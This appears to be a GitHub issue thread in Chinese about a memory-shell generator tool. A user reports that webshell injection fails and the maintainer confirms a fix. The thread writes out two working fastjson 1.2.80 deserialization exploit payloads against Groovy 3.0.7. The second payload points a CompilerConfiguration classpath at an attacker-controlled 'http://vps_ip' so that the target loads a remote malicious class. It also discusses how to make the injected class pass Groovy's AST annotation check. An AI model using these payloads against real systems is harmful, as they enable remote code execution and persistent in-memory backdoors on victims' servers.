Closed shellfeel closed 1 year ago
环境: jdk:1.8.0.261 org.codehaus.groovy: 3.0.7 springboot: 2.7.8 fastjson: 1.2.80
描述: 使用大佬的项目生成jar包放到vps或者解压后使用classpath供靶机加载 分别发送两次payload:
{"@type": "java.lang.Exception", "@type": "org.codehaus.groovy.control.CompilationFailedException", "unit": {} }
{"@type": "org.codehaus.groovy.control.ProcessingUnit", "@type": "org.codehaus.groovy.tools.javac.JavaStubCompilationUnit", "config": { "@type": "org.codehaus.groovy.control.CompilerConfiguration", "classpathList": "http://vps_ip" } }
结果请求都是成功但内存马却注入失败
调试半天发现是 ASTTransformationVisitor对远程的恶意类注解有判断,如果不是GroovyASTTransformation则不会调用 反编译工具生成的代码发现确实注解不满足要求:
工具生成方式:
帮忙看看啥问题
感谢反馈,已复现问题并完成修复,预计下个版本更新。
pen4uin
commented
1 year ago pen4uin
commented
1 year ago
环境: jdk:1.8.0.261 org.codehaus.groovy: 3.0.7 springboot: 2.7.8 fastjson: 1.2.80
描述: 使用大佬的项目生成jar包放到vps或者解压后使用classpath供靶机加载 分别发送两次payload:
结果请求都是成功但内存马却注入失败
调试半天发现是 ASTTransformationVisitor对远程的恶意类注解有判断,如果不是GroovyASTTransformation则不会调用
反编译工具生成的代码发现确实注解不满足要求:
工具生成方式:
帮忙看看啥问题